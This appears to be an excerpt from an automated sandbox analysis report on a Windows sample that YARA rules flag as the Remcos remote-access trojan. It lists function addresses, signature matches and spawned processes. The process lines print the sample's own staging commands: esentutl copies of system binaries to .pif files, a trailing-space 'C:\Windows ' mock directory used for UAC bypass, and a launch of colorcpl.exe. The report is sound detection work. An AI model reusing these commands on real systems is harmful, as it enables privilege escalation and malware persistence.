Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Code function: 19_2_02C420C4	19_2_02C420C4
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Code function: 19_2_02C4C95F	19_2_02C4C95F
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02EC6270	21_2_02EC6270
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02ED33AB	21_2_02ED33AB
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02EBE34B	21_2_02EBE34B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02EB706A	21_2_02EB706A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02E94005	21_2_02E94005
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02EB81E8	21_2_02EB81E8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02ED41D9	21_2_02ED41D9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02E9F18B	21_2_02E9F18B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02EBE11C	21_2_02EBE11C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02EB87F0	21_2_02EB87F0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02EA742E	21_2_02EA742E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02EBE5A8	21_2_02EBE5A8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02EB7566	21_2_02EB7566
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02EA7AD7	21_2_02EA7AD7
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02ECDA49	21_2_02ECDA49
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02E9DBF3	21_2_02E9DBF3
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02EB39D7	21_2_02EB39D7
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02EB797E	21_2_02EB797E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02EB5EEB	21_2_02EB5EEB
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02EBDEED	21_2_02EBDEED
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02EA6E9F	21_2_02EA6E9F
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02EA7C40	21_2_02EA7C40
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02EB7DB3	21_2_02EB7DB3

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: String function: 02CA894C appears 56 times
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: String function: 02C944DC appears 74 times
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: String function: 02CA89D0 appears 45 times
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: String function: 02C946D4 appears 244 times
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: String function: 02C94860 appears 949 times
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: String function: 02C94500 appears 33 times
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: String function: 02D4C400 appears 45 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 03202093 appears 50 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 03234801 appears 41 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 02E82093 appears 50 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 02EB4801 appears 41 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 03201E65 appears 34 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 03234E70 appears 54 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 02EB4E70 appears 54 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 02E81E65 appears 34 times
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Code function: String function: 02C5894C appears 50 times
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Code function: String function: 02C446D4 appears 155 times
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Code function: String function: 02C44860 appears 683 times

One or more processes crash

Source: C:\Windows\SysWOW64\colorcpl.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4280 -s 652

Sample file is different than original file name gathered from version info

Source: nft438A5fN.exe	Binary or memory string: OriginalFilename vs nft438A5fN.exe
Source: nft438A5fN.exe, 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs nft438A5fN.exe
Source: nft438A5fN.exe, 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs nft438A5fN.exe
Source: nft438A5fN.exe, 00000000.00000003.1592952655.000000003A563000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs nft438A5fN.exe
Source: nft438A5fN.exe, 00000000.00000002.1655641681.000000003960E000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs nft438A5fN.exe
Source: nft438A5fN.exe, 00000000.00000003.1592952655.000000003A534000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs nft438A5fN.exe
Source: nft438A5fN.exe, 00000000.00000003.1477595760.000000007FC9F000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs nft438A5fN.exe
Source: nft438A5fN.exe, 00000000.00000002.1670762206.000000007FAB0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs nft438A5fN.exe
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs nft438A5fN.exe
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTruesight4 vs nft438A5fN.exe
Source: nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs nft438A5fN.exe
Source: nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTruesight4 vs nft438A5fN.exe
Source: nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs nft438A5fN.exe
Source: nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTruesight4 vs nft438A5fN.exe
Source: nft438A5fN.exe, 00000000.00000002.1613117060.0000000002395000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs nft438A5fN.exe
Source: nft438A5fN.exe, 00000000.00000002.1655641681.0000000039626000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs nft438A5fN.exe

Uses 32bit PE files

Source: nft438A5fN.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Yara signature match

Source: 33.2.SndVol.exe.3290000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 33.2.SndVol.exe.3290000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 33.2.SndVol.exe.3290000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 33.2.SndVol.exe.3290000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 33.2.SndVol.exe.3290000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 33.2.SndVol.exe.3290000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 21.2.colorcpl.exe.2e80000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 21.2.colorcpl.exe.2e80000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 21.2.colorcpl.exe.2e80000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 11.2.colorcpl.exe.3200000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 11.2.colorcpl.exe.3200000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 11.2.colorcpl.exe.3200000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 21.2.colorcpl.exe.2e80000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 21.2.colorcpl.exe.2e80000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 21.2.colorcpl.exe.2e80000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 11.2.colorcpl.exe.3200000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 11.2.colorcpl.exe.3200000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 11.2.colorcpl.exe.3200000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0.2.nft438A5fN.exe.2c90000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.nft438A5fN.exe.2c90000.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000000.00000002.1666471917.000000007E810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: Process Memory Space: nft438A5fN.exe PID: 520, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: colorcpl.exe PID: 4280, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: colorcpl.exe PID: 432, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: SndVol.exe PID: 1376, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.rans.troj.spyw.expl.evad.winEXE@39/35@1/2

Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_0321798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,		11_2_0321798D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02E9798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,		21_2_02E9798D

Source: C:\Users\user\Desktop\nft438A5fN.exe

Code function: 0_2_02C97FD2 GetDiskFreeSpaceA,

0_2_02C97FD2

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 11_2_0320F4AF GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,

11_2_0320F4AF

Source: C:\Users\user\Desktop\nft438A5fN.exe

Code function: 0_2_02CA6DC8 CoCreateInstance,

0_2_02CA6DC8

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 11_2_0321B539 FindResourceA,LoadResource,LockResource,SizeofResource,

11_2_0321B539

Source: C:\Windows\SysWOW64\colorcpl.exe

11_2_0321AB9E

Source: C:\Users\user\Desktop\nft438A5fN.exe

File created: C:\Users\Public\Libraries\PNO

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4280
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4568:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2916:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess432
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1376

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\24e0cc18-8175-4616-8ea9-89ad3c39c315

Jump to behavior

Source: C:\Users\user\Desktop\nft438A5fN.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Users\user\Desktop\nft438A5fN.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: nft438A5fN.exe	ReversingLabs: Detection: 57%
Source: nft438A5fN.exe	Virustotal: Detection: 68%

Source: C:\Users\user\Desktop\nft438A5fN.exe

File read: C:\Users\user\Desktop\nft438A5fN.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\nft438A5fN.exe "C:\Users\user\Desktop\nft438A5fN.exe"
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\ovggtquW.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\nft438A5fN.exe /d C:\\Users\\Public\\Libraries\\Wuqtggvo.PIF /o
Source: C:\Windows\SysWOW64\esentutl.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
Source: C:\Windows\SysWOW64\colorcpl.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4280 -s 652
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
Source: C:\Users\Public\alpha.pif	Process created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
Source: unknown	Process created: C:\Users\Public\Libraries\Wuqtggvo.PIF "C:\Users\Public\Libraries\Wuqtggvo.PIF"
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
Source: C:\Windows\SysWOW64\colorcpl.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 432 -s 668
